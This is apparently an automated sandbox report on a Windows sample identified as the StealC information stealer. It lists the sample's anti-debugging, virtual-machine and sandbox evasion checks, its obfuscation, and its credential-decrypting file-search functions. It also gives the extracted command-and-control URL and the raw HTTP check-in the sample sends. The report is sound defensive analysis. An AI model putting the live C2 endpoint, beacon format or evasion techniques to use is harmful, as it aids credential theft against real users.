Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_005445C0 VirtualProtect ?,00000004,00000100,00000000

0_2_005445C0

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

0_2_00559860

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00559750 mov eax, dword ptr fs:[00000030h]

0_2_00559750

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00557850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_00557850

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 6652, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00559600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00559600

Source: file.exe, file.exe, 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: q/SProgram Manager

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_00557B90

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\file.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00556920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,

0_2_00556920

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00557850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_00557850

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00557A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

0_2_00557A30

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.540000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1824677690.000000000105E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1783006723.0000000004F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6652, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.540000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1824677690.000000000105E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1783006723.0000000004F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6652, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.37	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.37/	true	URL Reputation: malware	unknown
http://185.215.113.37/e2b1563c6670f193.php	true	URL Reputation: malware	unknown

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.37/	URL Reputation: Label: malware
Source: http://185.215.113.37	URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php	URL Reputation: Label: malware

Found malware configuration

Source: 0.2.file.exe.540000.0.unpack

Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0054C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,	0_2_0054C820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00547240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_00547240
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00549AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_00549AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00549B60 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_00549B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00558EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_00558EA0

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_005538B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00554910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00554910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0054DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0054DA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0054E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0054E430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00554570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_00554570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0054ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0054ED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0054BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0054BE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0054DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0054DE10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_005416D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0054F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0054F6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00553EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00553EA0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://185.215.113.37/e2b1563c6670f193.php

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBKJJEHCBAKFBFHJKFBKHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 36 42 34 30 41 34 46 34 39 31 34 34 32 39 33 39 34 34 32 32 30 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 2d 2d 0d 0a Data Ascii: ------CBKJJEHCBAKFBFHJKFBKContent-Disposition: form-data; name="hwid"A6B40A4F49144293944220------CBKJJEHCBAKFBFHJKFBKContent-Disposition: form-data; name="build"doma------CBKJJEHCBAKFBFHJKFBK--

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 185.215.113.37 185.215.113.37

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00544880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

0_2_00544880

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache

Source: unknown

Source: file.exe, 00000000.00000002.1824677690.000000000105E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1824677690.00000000010B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1824677690.00000000010B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1824677690.00000000010B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1824677690.00000000010B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php&
Source: file.exe, 00000000.00000002.1824677690.00000000010B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php2
Source: file.exe, 00000000.00000002.1824677690.00000000010B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpY
Source: file.exe, 00000000.00000002.1824677690.00000000010B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpg
Source: file.exe, 00000000.00000002.1824677690.00000000010C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpows
Source: file.exe, 00000000.00000002.1824677690.00000000010B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37=
Source: file.exe, 00000000.00000002.1824677690.000000000105E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37D

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Detected potential crypto function

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00900816	0_2_00900816
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0090583B	0_2_0090583B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008FD123	0_2_008FD123
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0090B125	0_2_0090B125
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009072A8	0_2_009072A8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009022EA	0_2_009022EA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008FECB6	0_2_008FECB6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007F4C36	0_2_007F4C36
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008CDC34	0_2_008CDC34
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00908D9E	0_2_00908D9E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0083154B	0_2_0083154B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00903D5B	0_2_00903D5B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007D9588	0_2_007D9588
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00810ECF	0_2_00810ECF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007F6F97	0_2_007F6F97

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\file.exe

Code function: String function: 005445C0 appears 316 times

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: tjghrrql ZLIB complexity 0.994973742716958

Source: file.exe

Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1

Source: classification engine

Classification label: mal100.troj.evad.winEXE@1/0@0/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00559600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00559600

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00553720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_00553720

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\3V0P032J.htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: file.exe

Static file information: File size 1825792 > 1048576

Source: file.exe

Static PE information: Raw size of tjghrrql is bigger than: 0x100000 < 0x197a00

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.540000.0.unpack :EW;.rsrc :W;.idata :W; :EW;tjghrrql:EW;uavtyefl:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;tjghrrql:EW;uavtyefl:EW;.taggant:EW;

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

0_2_00559860

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: file.exe

Static PE information: real checksum: 0x1bfbfe should be: 0x1cb738

PE file contains sections with non-standard names

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: tjghrrql
Source: file.exe	Static PE information: section name: uavtyefl
Source: file.exe	Static PE information: section name: .taggant

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B3086 push eax; mov dword ptr [esp], edx	0_2_009B30C3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A23886 push 4BFB78EBh; mov dword ptr [esp], ebx	0_2_00A238C9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A23886 push ebx; mov dword ptr [esp], ebp	0_2_00A23923
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0098E0AF push eax; mov dword ptr [esp], 7F978D2Dh	0_2_0098E0F8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009D70C8 push eax; mov dword ptr [esp], 4E265596h	0_2_009D71E3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009D70C8 push 431548ADh; mov dword ptr [esp], ebx	0_2_009D7203
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009D70C8 push 1A29FD00h; mov dword ptr [esp], eax	0_2_009D7390
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009BA8C2 push 5B471672h; mov dword ptr [esp], ebx	0_2_009BA8EB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0055B035 push ecx; ret	0_2_0055B048
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0091A0E5 push 2C1AF6F5h; mov dword ptr [esp], edx	0_2_0091A100
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0091A0E5 push eax; mov dword ptr [esp], esi	0_2_0091A285
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009890E4 push ecx; mov dword ptr [esp], ebp	0_2_0098913F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009890E4 push 51F2DC29h; mov dword ptr [esp], edx	0_2_00989173
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009A001A push ecx; mov dword ptr [esp], esi	0_2_009A0077
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00900816 push 59999B0Bh; mov dword ptr [esp], eax	0_2_00900844
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00900816 push edx; mov dword ptr [esp], 7DB375FCh	0_2_00900848
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00900816 push edx; mov dword ptr [esp], eax	0_2_0090092A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00900816 push 26F6661Eh; mov dword ptr [esp], ebp	0_2_0090099A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00900816 push eax; mov dword ptr [esp], 6A8E3E1Bh	0_2_00900A36
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00900816 push 2D61EBA9h; mov dword ptr [esp], esi	0_2_00900A5C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00900816 push eax; mov dword ptr [esp], ebx	0_2_00900ABA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00900816 push 7A4BB734h; mov dword ptr [esp], edi	0_2_00900AE5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00900816 push eax; mov dword ptr [esp], edx	0_2_00900B4A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00900816 push esi; mov dword ptr [esp], 5FE58B28h	0_2_00900BA5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00900816 push 74597172h; mov dword ptr [esp], edx	0_2_00900C21
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00900816 push 1C6FD371h; mov dword ptr [esp], esi	0_2_00900C56
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00900816 push ebp; mov dword ptr [esp], 37DF1CA8h	0_2_00900CA7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00900816 push 7A3BF454h; mov dword ptr [esp], ebx	0_2_00900CE1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00900816 push eax; mov dword ptr [esp], ecx	0_2_00900CE5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00900816 push 7472B847h; mov dword ptr [esp], ebp	0_2_00900D17
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00900816 push 36E51FF4h; mov dword ptr [esp], ebp	0_2_00900D2A

Source: file.exe

Static PE information: section name: tjghrrql entropy: 7.953395842513043

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\file.exe

0_2_00559860

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A2101 second address: 7A19FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 mov dword ptr [esp], eax 0x00000009 xor dword ptr [ebp+122D259Ah], esi 0x0000000f push dword ptr [ebp+122D0D8Dh] 0x00000015 jng 00007FE83906A39Fh 0x0000001b jmp 00007FE83906A399h 0x00000020 call dword ptr [ebp+122D1F76h] 0x00000026 pushad 0x00000027 mov dword ptr [ebp+122D2373h], esi 0x0000002d xor eax, eax 0x0000002f cmc 0x00000030 mov edx, dword ptr [esp+28h] 0x00000034 js 00007FE83906A38Ch 0x0000003a xor dword ptr [ebp+122D2594h], eax 0x00000040 add dword ptr [ebp+122D2594h], ecx 0x00000046 mov dword ptr [ebp+122D2CC7h], eax 0x0000004c jmp 00007FE83906A38Fh 0x00000051 add dword ptr [ebp+122D2594h], eax 0x00000057 mov esi, 0000003Ch 0x0000005c mov dword ptr [ebp+122D354Ah], ecx 0x00000062 pushad 0x00000063 add bh, 00000056h 0x00000066 jmp 00007FE83906A392h 0x0000006b popad 0x0000006c add esi, dword ptr [esp+24h] 0x00000070 mov dword ptr [ebp+122D354Ah], esi 0x00000076 lodsw 0x00000078 jmp 00007FE83906A396h 0x0000007d add eax, dword ptr [esp+24h] 0x00000081 stc 0x00000082 jmp 00007FE83906A38Ch 0x00000087 mov ebx, dword ptr [esp+24h] 0x0000008b sub dword ptr [ebp+122D2373h], edi 0x00000091 nop 0x00000092 jl 00007FE83906A394h 0x00000098 push eax 0x00000099 push eax 0x0000009a push edx 0x0000009b jmp 00007FE83906A391h 0x000000a0 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 911458 second address: 911463 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 911463 second address: 911467 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 911467 second address: 911470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A19E1 second address: 7A19E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A19E5 second address: 7A19FF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FE839054481h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91065F second address: 910686 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A38Dh 0x00000007 jmp 00007FE83906A392h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 910686 second address: 91068C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91098D second address: 910993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 910993 second address: 910997 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 910997 second address: 9109AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE83906A391h 0x0000000b rdtsc
